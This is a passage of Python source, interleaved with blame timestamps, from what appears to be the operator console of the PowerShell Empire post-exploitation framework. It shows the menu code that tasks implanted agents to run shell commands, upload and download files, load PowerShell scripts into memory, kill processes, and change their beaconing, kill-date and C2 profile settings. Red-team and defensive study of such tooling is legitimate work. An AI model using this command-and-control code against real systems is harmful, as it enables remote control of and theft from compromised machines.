|
|
|
|
if len(parts) == 1:
|
|
|
|
print helpers.color("[!] Please enter a valid '#ofCBs'")
|
|
|
|
|
|
|
|
elif parts[0].lower() == "all":
|
2015-08-10 22:50:18 +00:00
|
|
|
lostLimit = parts[1]
|
2015-08-10 02:18:02 +00:00
|
|
|
agents = self.mainMenu.agents.get_agents()
|
|
|
|
|
|
|
|
for agent in agents:
|
|
|
|
sessionID = agent[1]
|
|
|
|
# update this agent info in the database
|
2015-08-10 22:50:18 +00:00
|
|
|
self.mainMenu.agents.set_agent_field("lost_limit", lostLimit, sessionID)
|
2015-08-10 02:18:02 +00:00
|
|
|
# task the agent
|
2015-08-10 22:50:18 +00:00
|
|
|
self.mainMenu.agents.add_agent_task(sessionID, "TASK_SHELL", "Set-LostLimit " + str(lostLimit))
|
2015-08-10 02:18:02 +00:00
|
|
|
# update the agent log
|
2015-08-10 22:50:18 +00:00
|
|
|
msg = "Tasked agent to change lost limit " + str(lostLimit)
|
2015-08-10 02:18:02 +00:00
|
|
|
self.mainMenu.agents.save_agent_log(sessionID, msg)
|
|
|
|
|
|
|
|
else:
|
|
|
|
# extract the sessionID and clear the agent tasking
|
|
|
|
sessionID = self.mainMenu.agents.get_agent_id(parts[0])
|
|
|
|
|
2015-08-10 22:50:18 +00:00
|
|
|
lostLimit = parts[1]
|
2015-08-10 02:18:02 +00:00
|
|
|
|
|
|
|
if sessionID and len(sessionID) != 0:
|
|
|
|
# update this agent's information in the database
|
2015-08-10 22:50:18 +00:00
|
|
|
self.mainMenu.agents.set_agent_field("lost_limit", lostLimit, sessionID)
|
2015-08-10 02:18:02 +00:00
|
|
|
|
2015-08-10 22:50:18 +00:00
|
|
|
self.mainMenu.agents.add_agent_task(sessionID, "TASK_SHELL", "Set-LostLimit " + str(lostLimit))
|
2015-08-10 02:18:02 +00:00
|
|
|
# update the agent log
|
2015-08-10 22:50:18 +00:00
|
|
|
msg = "Tasked agent to change lost limit " + str(lostLimit)
|
2015-08-10 02:18:02 +00:00
|
|
|
self.mainMenu.agents.save_agent_log(sessionID, msg)
|
|
|
|
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Invalid agent name")
|
2015-08-05 18:36:39 +00:00
|
|
|
|
|
|
|
def do_killdate(self, line):
|
|
|
|
"Set the killdate for one or more agents (killdate [agent/all] 01/01/2016)."
|
|
|
|
|
|
|
|
parts = line.strip().split(" ")
|
|
|
|
|
|
|
|
if len(parts) == 1:
|
|
|
|
print helpers.color("[!] Please enter date in form 01/01/2016")
|
|
|
|
|
|
|
|
elif parts[0].lower() == "all":
|
|
|
|
date = parts[1]
|
|
|
|
|
|
|
|
agents = self.mainMenu.agents.get_agents()
|
|
|
|
|
|
|
|
for agent in agents:
|
|
|
|
sessionID = agent[1]
|
|
|
|
# update this agent's field in the database
|
|
|
|
self.mainMenu.agents.set_agent_field("kill_date", date, sessionID)
|
|
|
|
# task the agent
|
|
|
|
self.mainMenu.agents.add_agent_task(sessionID, "TASK_SHELL", "Set-KillDate " + str(date))
|
|
|
|
msg = "Tasked agent to set killdate to " + str(date)
|
|
|
|
self.mainMenu.agents.save_agent_log(sessionID, msg)
|
|
|
|
|
|
|
|
else:
|
|
|
|
# extract the sessionID and clear the agent tasking
|
|
|
|
sessionID = self.mainMenu.agents.get_agent_id(parts[0])
|
|
|
|
|
|
|
|
date = parts[1]
|
|
|
|
|
|
|
|
if sessionID and len(sessionID) != 0:
|
|
|
|
# update this agent's field in the database
|
|
|
|
self.mainMenu.agents.set_agent_field("kill_date", date, sessionID)
|
|
|
|
# task the agent
|
|
|
|
self.mainMenu.agents.add_agent_task(sessionID, "TASK_SHELL", "Set-KillDate " + str(date))
|
|
|
|
# update the agent log
|
|
|
|
msg = "Tasked agent to set killdate to " + str(date)
|
|
|
|
self.mainMenu.agents.save_agent_log(sessionID, msg)
|
|
|
|
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Invalid agent name")
|
|
|
|
|
|
|
|
|
|
|
|
def do_workinghours(self, line):
|
|
|
|
"Set the workinghours for one or more agents (workinghours [agent/all] 9:00-17:00)."
|
|
|
|
|
|
|
|
parts = line.strip().split(" ")
|
|
|
|
|
|
|
|
if len(parts) == 1:
|
|
|
|
print helpers.color("[!] Please enter hours in the form '9:00-17:00'")
|
|
|
|
|
|
|
|
elif parts[0].lower() == "all":
|
|
|
|
hours = parts[1]
|
|
|
|
|
|
|
|
agents = self.mainMenu.agents.get_agents()
|
|
|
|
|
|
|
|
for agent in agents:
|
|
|
|
sessionID = agent[1]
|
|
|
|
# update this agent's field in the database
|
|
|
|
self.mainMenu.agents.set_agent_field("working_hours", hours, sessionID)
|
|
|
|
# task the agent
|
|
|
|
self.mainMenu.agents.add_agent_task(sessionID, "TASK_SHELL", "Set-WorkingHours " + str(hours))
|
|
|
|
msg = "Tasked agent to set working hours to " + str(hours)
|
|
|
|
self.mainMenu.agents.save_agent_log(sessionID, msg)
|
|
|
|
|
|
|
|
else:
|
|
|
|
# extract the sessionID and clear the agent tasking
|
|
|
|
sessionID = self.mainMenu.agents.get_agent_id(parts[0])
|
|
|
|
|
|
|
|
hours = parts[1]
|
|
|
|
|
|
|
|
if sessionID and len(sessionID) != 0:
|
|
|
|
#update this agent's field in the database
|
|
|
|
self.mainMenu.agents.set_agent_field("working_hours", hours, sessionID)
|
|
|
|
# task the agent
|
|
|
|
self.mainMenu.agents.add_agent_task(sessionID, "TASK_SHELL", "Set-WorkingHours " + str(hours))
|
|
|
|
|
|
|
|
# update the agent log
|
|
|
|
msg = "Tasked agent to set working hours to " + str(hours)
|
|
|
|
self.mainMenu.agents.save_agent_log(sessionID, msg)
|
|
|
|
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Invalid agent name")
|
|
|
|
|
|
|
|
|
|
|
|
def do_remove(self, line):
|
|
|
|
"Remove one or more agents from the database."
|
|
|
|
|
|
|
|
name = line.strip()
|
|
|
|
|
|
|
|
if name.lower() == "all":
|
|
|
|
try:
|
|
|
|
choice = raw_input(helpers.color("[>] Remove all agents from the database? [y/N] ", "red"))
|
|
|
|
if choice.lower() != "" and choice.lower()[0] == "y":
|
|
|
|
self.mainMenu.agents.remove_agent('%')
|
|
|
|
except KeyboardInterrupt as e: print ""
|
|
|
|
|
|
|
|
else:
|
|
|
|
|
|
|
|
# extract the sessionID and clear the agent tasking
|
|
|
|
sessionID = self.mainMenu.agents.get_agent_id(name)
|
|
|
|
|
|
|
|
if sessionID and len(sessionID) != 0:
|
|
|
|
self.mainMenu.agents.remove_agent(sessionID)
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Invalid agent name")
|
|
|
|
|
|
|
|
|
|
|
|
def do_listeners(self, line):
|
|
|
|
"Jump to the listeners menu."
|
|
|
|
l = ListenerMenu(self.mainMenu)
|
|
|
|
l.cmdloop()
|
|
|
|
|
|
|
|
|
|
|
|
def do_usestager(self, line):
|
|
|
|
"Use an Empire stager."
|
|
|
|
|
|
|
|
parts = line.split(" ")
|
|
|
|
|
|
|
|
if parts[0] not in self.mainMenu.stagers.stagers:
|
|
|
|
print helpers.color("[!] Error: invalid stager module")
|
|
|
|
|
|
|
|
elif len(parts) == 1:
|
|
|
|
l = StagerMenu(self.mainMenu, parts[0])
|
|
|
|
l.cmdloop()
|
|
|
|
elif len(parts) == 2:
|
|
|
|
listener = parts[1]
|
|
|
|
if not self.mainMenu.listeners.is_listener_valid(listener):
|
|
|
|
print helpers.color("[!] Please enter a valid listener name or ID")
|
|
|
|
else:
|
|
|
|
self.mainMenu.stagers.set_stager_option('Listener', listener)
|
|
|
|
l = StagerMenu(self.mainMenu, parts[0])
|
|
|
|
l.cmdloop()
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Error in AgentsMenu's do_userstager()")
|
|
|
|
|
|
|
|
|
|
|
|
def do_usemodule(self, line):
|
|
|
|
"Use an Empire PowerShell module."
|
|
|
|
|
|
|
|
module = line.strip()
|
|
|
|
|
|
|
|
if module not in self.mainMenu.modules.modules:
|
|
|
|
print helpers.color("[!] Error: invalid module")
|
|
|
|
else:
|
|
|
|
# set agent to "all"
|
|
|
|
l = ModuleMenu(self.mainMenu, line, agent="all")
|
|
|
|
l.cmdloop()
|
|
|
|
|
|
|
|
|
|
|
|
def do_searchmodule(self, line):
|
|
|
|
"Search Empire module names/descriptions."
|
|
|
|
|
|
|
|
searchTerm = line.strip()
|
|
|
|
|
|
|
|
if searchTerm.strip() == "":
|
|
|
|
print helpers.color("[!] Please enter a search term.")
|
|
|
|
else:
|
|
|
|
self.mainMenu.modules.search_modules(searchTerm)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_interact(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete an interact command"
|
|
|
|
|
|
|
|
names = self.mainMenu.agents.get_agent_names()
|
|
|
|
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in names if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
def complete_rename(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete a rename command"
|
|
|
|
|
|
|
|
names = self.mainMenu.agents.get_agent_names()
|
|
|
|
|
|
|
|
return self.complete_interact(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_clear(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete a clear command"
|
|
|
|
|
|
|
|
names = self.mainMenu.agents.get_agent_names() + ["all"]
|
|
|
|
|
|
|
|
mline = line.partition(' ')[2]
|
|
|
|
offs = len(mline) - len(text)
|
|
|
|
return [s[offs:] for s in names if s.startswith(mline)]
|
|
|
|
|
|
|
|
|
|
|
|
def complete_remove(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete a remove command"
|
|
|
|
|
|
|
|
return self.complete_clear(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_kill(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete a kill command"
|
|
|
|
|
|
|
|
return self.complete_clear(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_sleep(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete a sleep command"
|
|
|
|
|
|
|
|
return self.complete_clear(text, line, begidx, endidx)
|
|
|
|
|
2015-08-10 22:50:18 +00:00
|
|
|
def complete_lostlimit(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete a lostlimit command"
|
2015-08-10 02:18:02 +00:00
|
|
|
|
|
|
|
return self.complete_clear(text, line, begidx, endidx)
|
2015-08-05 18:36:39 +00:00
|
|
|
|
|
|
|
def complete_killdate(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete a killdate command"
|
|
|
|
|
|
|
|
return self.complete_clear(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_workinghours(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete a workinghours command"
|
|
|
|
|
|
|
|
return self.complete_clear(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_usemodule(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete an Empire PowerShell module path"
|
|
|
|
return self.mainMenu.complete_usemodule(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_usestager(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete an Empire stager module path."
|
|
|
|
return self.mainMenu.complete_usestager(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
def complete_creds(self, text, line, begidx, endidx):
|
|
|
|
"Tab-complete 'creds' commands."
|
|
|
|
return self.mainMenu.complete_creds(text, line, begidx, endidx)
|
|
|
|
|
|
|
|
|
|
|
|
class AgentMenu(cmd.Cmd):
|
|
|
|
|
|
|
|
def __init__(self, mainMenu, sessionID):
|
|
|
|
|
|
|
|
cmd.Cmd.__init__(self)
|
|
|
|
|
|
|
|
self.mainMenu = mainMenu
|
|
|
|
|
|
|
|
self.sessionID = sessionID
|
|
|
|
|
|
|
|
self.doc_header = 'Agent Commands'
|
|
|
|
|
|
|
|
# try to resolve the sessionID to a name
|
|
|
|
name = self.mainMenu.agents.get_agent_name(sessionID)
|
|
|
|
|
|
|
|
# set the text prompt
|
|
|
|
self.prompt = '(Empire: '+helpers.color(name, 'red')+') > '
|
|
|
|
|
|
|
|
# shell commands to tab complete
|
|
|
|
self.shellCmds = ["ls","dir","rm","del","pwd","cat","cd","mkdir","rmdir","mv","arp","netstat","ipconfig","ifconfig","net","route","reboot","restart","shutdown","ps","getpid","whoami", "getuid"]
|
|
|
|
|
|
|
|
# listen for messages from this specific agent
|
|
|
|
dispatcher.connect( self.handle_agent_event, sender=dispatcher.Any)
|
|
|
|
|
|
|
|
# display any results from the database that were stored
|
|
|
|
# while we weren't interacting with the agent
|
|
|
|
results = self.mainMenu.agents.get_agent_results(self.sessionID)
|
|
|
|
if results:
|
|
|
|
print "\n" + results.rstrip('\r\n')
|
|
|
|
|
|
|
|
|
|
|
|
def handle_agent_event(self, signal, sender):
|
|
|
|
"""
|
|
|
|
Handle agent event signals.
|
|
|
|
"""
|
|
|
|
if "[!] Agent" in signal and "exiting" in signal: pass
|
|
|
|
|
|
|
|
name = self.mainMenu.agents.get_agent_name(self.sessionID)
|
|
|
|
|
|
|
|
if (str(self.sessionID) + " returned results" in signal) or (str(name) + " returned results" in signal):
|
|
|
|
# display any results returned by this agent that are returned
|
|
|
|
# while we are interacting with it
|
|
|
|
results = self.mainMenu.agents.get_agent_results(self.sessionID)
|
|
|
|
if results:
|
|
|
|
print "\n" + results
|
|
|
|
|
|
|
|
elif "[+] Part of file" in signal and "saved" in signal:
|
|
|
|
if (str(self.sessionID) in signal) or (str(name) in signal):
|
|
|
|
print helpers.color(signal)
|
|
|
|
|
|
|
|
|
|
|
|
# print a nicely formatted help menu
|
|
|
|
# stolen/adapted from recon-ng
|
|
|
|
def print_topics(self, header, cmds, cmdlen, maxcol):
|
|
|
|
if cmds:
|
|
|
|
self.stdout.write("%s\n"%str(header))
|
|
|
|
if self.ruler:
|
|
|
|
self.stdout.write("%s\n"%str(self.ruler * len(header)))
|
|
|
|
for cmd in cmds:
|
|
|
|
self.stdout.write("%s %s\n" % (cmd.ljust(17), getattr(self, 'do_' + cmd).__doc__))
|
|
|
|
self.stdout.write("\n")
|
|
|
|
|
|
|
|
|
|
|
|
def emptyline(self): pass
|
|
|
|
|
|
|
|
|
|
|
|
def default(self, line):
|
|
|
|
"Default handler"
|
|
|
|
|
|
|
|
line = line.strip()
|
|
|
|
parts = line.split(" ")
|
|
|
|
|
|
|
|
if len(parts) > 0:
|
|
|
|
# check if we got a shell command
|
|
|
|
if parts[0] in self.shellCmds:
|
|
|
|
shellcmd = " ".join(parts)
|
|
|
|
# task the agent with this shell command
|
|
|
|
self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_SHELL", shellcmd)
|
|
|
|
# update the agent log
|
|
|
|
msg = "Tasked agent to run shell command " + line
|
|
|
|
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
|
|
|
|
|
|
|
|
|
|
|
|
def do_back(self, line):
|
|
|
|
"Go back a menu."
|
|
|
|
return True
|
|
|
|
|
|
|
|
|
|
|
|
def do_main(self, line):
|
|
|
|
"Go back to the main menu."
|
|
|
|
raise StopIteration
|
|
|
|
|
|
|
|
|
|
|
|
def do_rename(self, line):
|
|
|
|
"Rename the agent."
|
|
|
|
|
|
|
|
parts = line.strip().split(" ")
|
|
|
|
oldname = self.mainMenu.agents.get_agent_name(self.sessionID)
|
|
|
|
|
|
|
|
# name sure we get a new name to rename this agent
|
|
|
|
if len(parts) == 1:
|
|
|
|
# replace the old name with the new name
|
|
|
|
result = self.mainMenu.agents.rename_agent(oldname, parts[0])
|
|
|
|
if result:
|
|
|
|
self.prompt = "(Empire: "+helpers.color(parts[0],'red')+") > "
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please enter a new name for the agent")
|
|
|
|
|
|
|
|
|
|
|
|
def do_info(self, line):
|
|
|
|
"Display information about this agent"
|
|
|
|
|
|
|
|
# get the agent name, if applicable
|
|
|
|
agent = self.mainMenu.agents.get_agent(self.sessionID)
|
|
|
|
messages.display_agent(agent)
|
|
|
|
|
|
|
|
|
|
|
|
def do_exit(self, line):
|
|
|
|
"Task agent to exit."
|
|
|
|
|
|
|
|
try:
|
|
|
|
choice = raw_input(helpers.color("[>] Task agent to exit? [y/N] ", "red"))
|
|
|
|
if choice.lower() != "" and choice.lower()[0] == "y":
|
|
|
|
|
|
|
|
self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_EXIT")
|
|
|
|
# update the agent log
|
|
|
|
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to exit")
|
|
|
|
a = AgentsMenu(self.mainMenu)
|
|
|
|
a.cmdloop()
|
|
|
|
except KeyboardInterrupt as e: print ""
|
|
|
|
|
|
|
|
|
|
|
|
def do_clear(self, line):
|
|
|
|
"Clear out agent tasking."
|
|
|
|
self.mainMenu.agents.clear_agent_tasks(self.sessionID)
|
|
|
|
|
|
|
|
|
|
|
|
def do_jobs(self, line):
|
|
|
|
"Return jobs or kill a running job."
|
|
|
|
|
|
|
|
parts = line.split(" ")
|
|
|
|
|
|
|
|
if len(parts) == 1:
|
|
|
|
if parts[0] == '':
|
|
|
|
self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_GETJOBS")
|
|
|
|
# update the agent log
|
|
|
|
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get running jobs")
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please use form 'jobs kill JOB_ID'")
|
|
|
|
elif len(parts) == 2:
|
|
|
|
jobID = parts[1].strip()
|
|
|
|
self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_STOPJOB", jobID)
|
|
|
|
# update the agent log
|
|
|
|
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to stop job " + str(jobID))
|
|
|
|
|
|
|
|
|
|
|
|
def do_sleep(self, line):
|
|
|
|
"Task an agent to 'sleep interval [jitter]'"
|
|
|
|
|
|
|
|
parts = line.strip().split(" ")
|
|
|
|
|
|
|
|
if len(parts) > 0 and parts[0] != "":
|
|
|
|
delay = parts[0]
|
|
|
|
jitter = 0.0
|
|
|
|
if len(parts) == 2:
|
|
|
|
jitter = parts[1]
|
|
|
|
|
|
|
|
# update this agent's information in the database
|
|
|
|
self.mainMenu.agents.set_agent_field("delay", delay, self.sessionID)
|
|
|
|
self.mainMenu.agents.set_agent_field("jitter", jitter, self.sessionID)
|
|
|
|
|
|
|
|
self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_SHELL", "Set-Delay " + str(delay) + " " + str(jitter))
|
|
|
|
# update the agent log
|
|
|
|
msg = "Tasked agent to delay sleep/jitter " + str(delay) + "/" + str(jitter)
|
|
|
|
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
|
|
|
|
|
2015-08-10 22:50:18 +00:00
|
|
|
def do_lostlimit(self, line):
|
|
|
|
"Task an agent to change the limit on lost agent detection"
|
2015-08-10 02:18:02 +00:00
|
|
|
|
|
|
|
parts = line.strip().split(" ")
|
|
|
|
if len(parts) > 0 and parts[0] != "":
|
2015-08-10 22:50:18 +00:00
|
|
|
lostLimit = parts[0]
|
2015-08-10 02:18:02 +00:00
|
|
|
|
|
|
|
# update this agent's information in the database
|
2015-08-10 22:50:18 +00:00
|
|
|
self.mainMenu.agents.set_agent_field("lost_limit", lostLimit, self.sessionID)
|
|
|
|
self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_SHELL", "Set-LostLimit " + str(lostLimit))
|
2015-08-10 02:18:02 +00:00
|
|
|
# update the agent log
|
2015-08-10 22:50:18 +00:00
|
|
|
msg = "Tasked agent to change lost limit " + str(lostLimit)
|
2015-08-10 02:18:02 +00:00
|
|
|
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
|
|
|
|
|
2015-08-05 18:36:39 +00:00
|
|
|
|
|
|
|
def do_kill(self, line):
|
|
|
|
"Task an agent to kill a particular process name or ID."
|
|
|
|
|
|
|
|
parts = line.strip().split(" ")
|
|
|
|
process = parts[0]
|
|
|
|
|
|
|
|
if process == "":
|
|
|
|
print helpers.color("[!] Please enter a process name or ID.")
|
|
|
|
else:
|
|
|
|
# if we were passed a process ID
|
|
|
|
if process.isdigit():
|
|
|
|
command = "Stop-Process " + str(process) + " -Force"
|
|
|
|
else:
|
|
|
|
# otherwise assume we were passed a process name
|
|
|
|
# so grab all processes by this name and kill them
|
|
|
|
command = "Get-Process " + str(process) + " | %{Stop-Process $_.Id -Force}"
|
|
|
|
|
|
|
|
self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_SHELL", command)
|
|
|
|
|
|
|
|
# update the agent log
|
|
|
|
msg = "Tasked agent to kill process: " + str(process)
|
|
|
|
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
|
|
|
|
|
|
|
|
|
|
|
|
def do_killdate(self, line):
|
|
|
|
"Get or set an agent's killdate (01/01/2016)."
|
|
|
|
|
|
|
|
parts = line.strip().split(" ")
|
|
|
|
date = parts[0]
|
|
|
|
|
|
|
|
if date == "":
|
|
|
|
self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_SHELL", "Get-KillDate")
|
|
|
|
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get KillDate")
|
|
|
|
|
|
|
|
else:
|
|
|
|
# update this agent's information in the database
|
|
|
|
self.mainMenu.agents.set_agent_field("kill_date", date, self.sessionID)
|
|
|
|
|
|
|
|
# task the agent
|
|
|
|
self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_SHELL", "Set-KillDate " + str(date))
|
|
|
|
|
|
|
|
# update the agent log
|
|
|
|
msg = "Tasked agent to set killdate to " + str(date)
|
|
|
|
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
|
|
|
|
|
|
|
|
|
|
|
|
def do_workinghours(self, line):
|
|
|
|
"Get or set an agent's working hours (9:00-17:00)."
|
|
|
|
|
|
|
|
parts = line.strip().split(" ")
|
|
|
|
hours = parts[0]
|
|
|
|
|
|
|
|
if hours == "":
|
|
|
|
self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_SHELL", "Get-WorkingHours")
|
|
|
|
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get working hours")
|
|
|
|
|
|
|
|
else:
|
|
|
|
# update this agent's information in the database
|
|
|
|
self.mainMenu.agents.set_agent_field("working_hours", hours, self.sessionID)
|
|
|
|
|
|
|
|
# task the agent
|
|
|
|
self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_SHELL", "Set-WorkingHours " + str(hours))
|
|
|
|
|
|
|
|
# update the agent log
|
|
|
|
msg = "Tasked agent to set working hours to " + str(hours)
|
|
|
|
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
def do_shell(self, line):
|
|
|
|
"Task an agent to use a shell command."
|
|
|
|
|
|
|
|
line = line.strip()
|
|
|
|
|
|
|
|
if line != "":
|
|
|
|
# task the agent with this shell command
|
|
|
|
self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_SHELL", line)
|
|
|
|
# update the agent log
|
|
|
|
msg = "Tasked agent to run shell command " + line
|
|
|
|
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
|
|
|
|
|
|
|
|
|
|
|
|
def do_sysinfo(self, line):
|
|
|
|
"Task an agent to get system information."
|
|
|
|
|
|
|
|
# task the agent with this shell command
|
|
|
|
self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_SYSINFO")
|
|
|
|
# update the agent log
|
|
|
|
self.mainMenu.agents.save_agent_log(self.sessionID, "Tasked agent to get system information")
|
|
|
|
|
|
|
|
|
|
|
|
def do_download(self,line):
|
|
|
|
"Task an agent to download a file."
|
|
|
|
|
|
|
|
line = line.strip()
|
|
|
|
|
|
|
|
if line != "":
|
|
|
|
self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_DOWNLOAD", line)
|
|
|
|
# update the agent log
|
|
|
|
msg = "Tasked agent to download " + line
|
|
|
|
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
|
|
|
|
|
|
|
|
|
|
|
|
def do_upload(self,line):
|
|
|
|
"Task an agent to upload a file."
|
|
|
|
|
|
|
|
# "upload /path/file.ext" or "upload /path/file/file.ext newfile.ext"
|
|
|
|
# absolute paths accepted
|
|
|
|
parts = line.strip().split(" ")
|
|
|
|
uploadname = ""
|
|
|
|
|
|
|
|
if len(parts) > 0 and parts[0] != "":
|
|
|
|
if len(parts) == 1:
|
|
|
|
# if we're uploading the file with its original name
|
|
|
|
uploadname = os.path.basename(parts[0])
|
|
|
|
else:
|
|
|
|
# if we're uploading the file as a different name
|
|
|
|
uploadname = parts[1].strip()
|
|
|
|
|
|
|
|
if parts[0] != "" and os.path.exists(parts[0]):
|
|
|
|
# read in the file and base64 encode it for transport
|
|
|
|
f = open(parts[0], 'r')
|
|
|
|
fileData = f.read()
|
|
|
|
f.close()
|
|
|
|
|
|
|
|
msg = "Tasked agent to upload " + parts[0] + " : " + hashlib.md5(fileData).hexdigest()
|
|
|
|
# update the agent log with the filename and MD5
|
|
|
|
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
|
|
|
|
|
|
|
|
fileData = helpers.encode_base64(fileData)
|
|
|
|
# upload packets -> "filename | script data"
|
|
|
|
data = uploadname + "|" + fileData
|
|
|
|
self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_UPLOAD", data)
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please enter a valid file path to upload")
|
|
|
|
|
|
|
|
|
|
|
|
def do_scriptimport(self, line):
|
|
|
|
"Imports a PowerShell script and keeps it in memory in the agent."
|
|
|
|
|
|
|
|
path = line.strip()
|
|
|
|
|
|
|
|
if path != "" and os.path.exists(path):
|
|
|
|
f = open(path, 'r')
|
|
|
|
scriptData = f.read()
|
|
|
|
f.close()
|
|
|
|
|
|
|
|
# strip out comments and blank lines from the imported script
|
|
|
|
scriptData = helpers.strip_powershell_comments(scriptData)
|
|
|
|
|
|
|
|
# task the agent to important the script
|
|
|
|
self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_SCRIPT_IMPORT", scriptData)
|
|
|
|
# update the agent log with the filename and MD5
|
|
|
|
msg = "Tasked agent to import " + path + " : " + hashlib.md5(scriptData).hexdigest()
|
|
|
|
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
|
|
|
|
|
|
|
|
# extract the functions from the script so we can tab-complete them
|
|
|
|
functions = helpers.parse_powershell_script(scriptData)
|
|
|
|
|
|
|
|
# set this agent's tab-completable functions
|
|
|
|
self.mainMenu.agents.set_agent_functions(self.sessionID,functions)
|
|
|
|
|
|
|
|
else:
|
|
|
|
print helpers.color("[!] Please enter a valid script path")
|
|
|
|
|
|
|
|
|
|
|
|
def do_scriptcmd(self, line):
|
|
|
|
"Execute a function in the currently imported PowerShell script."
|
|
|
|
|
|
|
|
cmd = line.strip()
|
|
|
|
|
|
|
|
if cmd != "":
|
|
|
|
self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_SCRIPT_COMMAND", cmd)
|
|
|
|
msg = "[*] Tasked agent "+self.sessionID+" to run " + cmd
|
|
|
|
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
|
|
|
|
|
|
|
|
|
|
|
|
def do_usemodule(self, line):
|
|
|
|
"Use an Empire PowerShell module."
|
|
|
|
|
|
|
|
module = line.strip()
|
|
|
|
|
|
|
|
if module not in self.mainMenu.modules.modules:
|
|
|
|
print helpers.color("[!] Error: invalid module")
|
|
|
|
else:
|
|
|
|
l = ModuleMenu(self.mainMenu, line, agent=self.sessionID)
|
|
|
|
l.cmdloop()
|
|
|
|
|
|
|
|
|
|
|
|
def do_searchmodule(self, line):
|
|
|
|
"Search Empire module names/descriptions."
|
|
|
|
|
|
|
|
searchTerm = line.strip()
|
|
|
|
|
|
|
|
if searchTerm.strip() == "":
|
|
|
|
print helpers.color("[!] Please enter a search term.")
|
|
|
|
else:
|
|
|
|
self.mainMenu.modules.search_modules(searchTerm)
|
|
|
|
|
|
|
|
|
|
|
|
def do_updateprofile(self, line):
|
|
|
|
"Update an agent connection profile."
|
|
|
|
|
|
|
|
# profile format:
|
|
|
|
# TaskURI1,TaskURI2,...|UserAgent|OptionalHeader1,OptionalHeader2...
|
|
|
|
|
|
|
|
profile = line.strip().strip()
|
|
|
|
|
|
|
|
if profile != "" :
|
|
|
|
# load up a profile from a file if a path was passed
|
|
|
|
if os.path.exists(profile):
|
|
|
|
f = open(profile, 'r')
|
|
|
|
profile = f.readlines()
|
|
|
|
f.close()
|
|
|
|
# strip out profile comments and blank lines
|
|
|
|
profile = [l for l in profile if (not l.startswith("#") and l.strip() != "")]
|
|
|
|
profile = profile[0]
|
|
|
|
if not profile.strip().startswith("\"/"):
|
|
|
|
print helpers.color("[!] Task URIs in profiles must start with / and be enclosed in quotes!")
|
|
|
|
else:
|
|
|
|
updatecmd = "Update-Profile " + profile
|
|
|
|
|
|
|
|
# task the agent to update their profile
|
|
|
|
self.mainMenu.agents.add_agent_task(self.sessionID, "TASK_CMD_WAIT", updatecmd)
|
|
|
|
|
|
|
|
# update the agent's profile in the database
|
|
|
|
self.mainMenu.agents.update_agent_profile(self.sessionID, profile)
|
|
|
|
|
|
|
|
# print helpers.color("[*] Tasked agent "+self.sessionID+" to run " + updatecmd)
|
|
|
|
# update the agent log
|
|
|
|
msg = "Tasked agent to update profile " + profile
|
|
|
|
self.mainMenu.agents.save_agent_log(self.sessionID, msg)
|
|
|
|
|
|
|
|
else:
|
|
|
|
